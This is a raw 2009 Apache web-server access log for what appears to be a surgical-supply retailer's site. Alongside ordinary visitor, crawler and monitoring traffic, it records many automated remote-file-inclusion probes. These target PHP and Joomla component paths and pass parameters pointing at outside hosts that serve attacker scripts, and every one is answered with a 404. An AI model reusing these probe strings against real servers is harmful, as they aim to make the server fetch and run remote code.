213.206.93.3 - - [29/May/2009:06:37:55 -0400] "GET /logs/index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
213.206.93.3 - - [29/May/2009:06:37:57 -0400] "GET /logs/error_log.Q108120300/index.php?option=com_joomfish&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
69.50.197.106 - - [29/May/2009:06:38:01 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:06:38:01 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:06:38:01 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:38:06 -0400] "GET /logs/index.php?inhalt=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:06:38:06 -0400] "GET /index.php?inhalt=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.50.197.106 - - [29/May/2009:06:38:19 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.109.102.96 - - [29/May/2009:06:39:43 -0400] "GET //tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
210.109.102.96 - - [29/May/2009:06:39:46 -0400] "GET /logs//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.109.102.96 - - [29/May/2009:06:39:47 -0400] "GET /logs/access_log.Q109052100//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
172.16.1.180 - - [29/May/2009:06:39:51 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [29/May/2009:06:39:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [29/May/2009:06:39:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [29/May/2009:06:41:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [29/May/2009:06:41:13 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:41:13 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:06:41:13 -0400] "GET /logs/access_log.Q108121900%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
69.237.82.158 - - [29/May/2009:06:41:25 -0400] "GET /logs//components/com_magazine//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.237.82.158 - - [29/May/2009:06:41:26 -0400] "GET //components/com_magazine//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:41:34 -0400] "GET /about.php?inc_dir=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:41:34 -0400] "GET /logs/about.php?inc_dir=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:41:34 -0400] "GET /logs/access_log.Q109052200/about.php?inc_dir=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:42 -0400] "GET /logs/access_log.Q109052200/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:42 -0400] "GET /about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:42 -0400] "GET /logs/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
172.16.1.180 - - [29/May/2009:06:41:42 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [29/May/2009:06:41:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [29/May/2009:06:41:42 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
121.165.73.157 - - [29/May/2009:06:41:47 -0400] "GET /logs//components/com_magazine//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:06:41:47 -0400] "GET //components/com_magazine//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:49 -0400] "GET /logs/access_log.Q109052200/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:49 -0400] "GET /logs/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:49 -0400] "GET /about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:41:58 -0400] "GET /about.php?inc_dir=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:58 -0400] "GET /logs/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:58 -0400] "GET /about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:41:58 -0400] "GET /logs/access_log.Q109052200/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:42:07 -0400] "GET /logs/access_log.Q109052200%20%20/about.php?inc_dir=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:42:07 -0400] "GET /logs/about.php?inc_dir=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:23 -0400] "GET /logs/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:23 -0400] "GET /logs/access_log.Q109052200%20%20/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:23 -0400] "GET /about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:38 -0400] "GET /about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:38 -0400] "GET /logs/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:38 -0400] "GET /logs/access_log.Q109052200/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:41 -0400] "GET /logs/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:41 -0400] "GET /about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:42:41 -0400] "GET /logs/access_log.Q109052200%20%20/about.php?inc_dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.44.232.81 - - [29/May/2009:06:43:03 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
172.16.1.180 - - [29/May/2009:06:43:06 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [29/May/2009:06:43:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [29/May/2009:06:43:06 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
207.44.232.81 - - [29/May/2009:06:43:18 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:43:37 -0400] "GET //skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:44:06 -0400] "GET //skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:44:06 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:44:06 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.89.181.197 - - [29/May/2009:06:44:06 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.813"
207.44.232.81 - - [29/May/2009:06:44:38 -0400] "GET //technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 333 "-" "Mozilla/5.0"
207.44.232.81 - - [29/May/2009:06:44:38 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
207.44.232.81 - - [29/May/2009:06:44:39 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 360 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:45:12 -0400] "GET //skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:45:12 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:45:12 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [29/May/2009:06:45:13 -0400] "GET //technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 333 "-" "Mozilla/5.0"
217.147.29.190 - - [29/May/2009:06:45:13 -0400] "GET /logs/access_log.Q109051800//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 360 "-" "Mozilla/5.0"
217.147.29.190 - - [29/May/2009:06:45:13 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 338 "-" "Mozilla/5.0"
210.109.102.96 - - [29/May/2009:06:45:30 -0400] "GET /logs/access_log.Q109051000//tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
192.138.41.10 - - [29/May/2009:06:45:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible;)"
192.138.41.10 - - [29/May/2009:06:45:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible;)"
192.138.41.10 - - [29/May/2009:06:45:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
192.138.41.10 - - [29/May/2009:06:45:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.59.12.99 - - [29/May/2009:06:46:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.17 - - [29/May/2009:06:46:18 -0400] "GET /logs/access_log.Q107081400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
201.232.54.48 - - [29/May/2009:06:46:22 -0400] "GET /logs/access_log.Q108112300%20%20//skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt?????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.75.4.169 - - [29/May/2009:06:46:32 -0400] "GET /logs/access_log.Q109051500/index.php?option=com_comprofiler&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
218.249.36.194 - - [29/May/2009:06:46:56 -0400] "GET /logs/access_log.Q108112300%20%20//skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:47:15 -0400] "GET /logs/config.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:47:15 -0400] "GET /logs/access_log.Q109052200/config.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:47:15 -0400] "GET /config.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:06:47:32 -0400] "GET /logs/access_log.Q108112300%20%20//skin/zero_vote/error.php?dir=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:49:11 -0400] "GET /logs/access_log.Q109052200%20%20/config.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:49:14 -0400] "GET /logs/config.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:49:14 -0400] "GET /logs/access_log.Q109052200/config.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:49:14 -0400] "GET /config.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
207.44.232.81 - - [29/May/2009:06:50:29 -0400] "GET /logs/access_log.Q109051800%20%20//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 362 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:06:51:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [29/May/2009:06:51:12 -0400] "GET /logs/access_log.Q109051800%20%20//technote7/skin_shop/standard/2_view_body/technote7/skin_shop/standard/3_plugin_twindow/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 362 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:06:51:59 -0400] "GET /logs/access_log.Q109052200%20%20/config.php?inc_dir=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
221.251.28.84 - - [29/May/2009:06:52:40 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:40 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
210.109.102.96 - - [29/May/2009:06:52:48 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.109.102.96 - - [29/May/2009:06:52:49 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.109.102.96 - - [29/May/2009:06:52:51 -0400] "GET /logs/access_log.Q109010700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.prof-perevod.ru/img/office1.jpg??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
221.251.28.84 - - [29/May/2009:06:52:50 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493 HTTP/1.1" 200 37475 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:52 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:52 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:54 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:54 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:54 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:55 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:55 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:55 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:56 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:56 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:56 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:57 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:57 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:57 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:58 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [29/May/2009:06:52:58 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0077493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
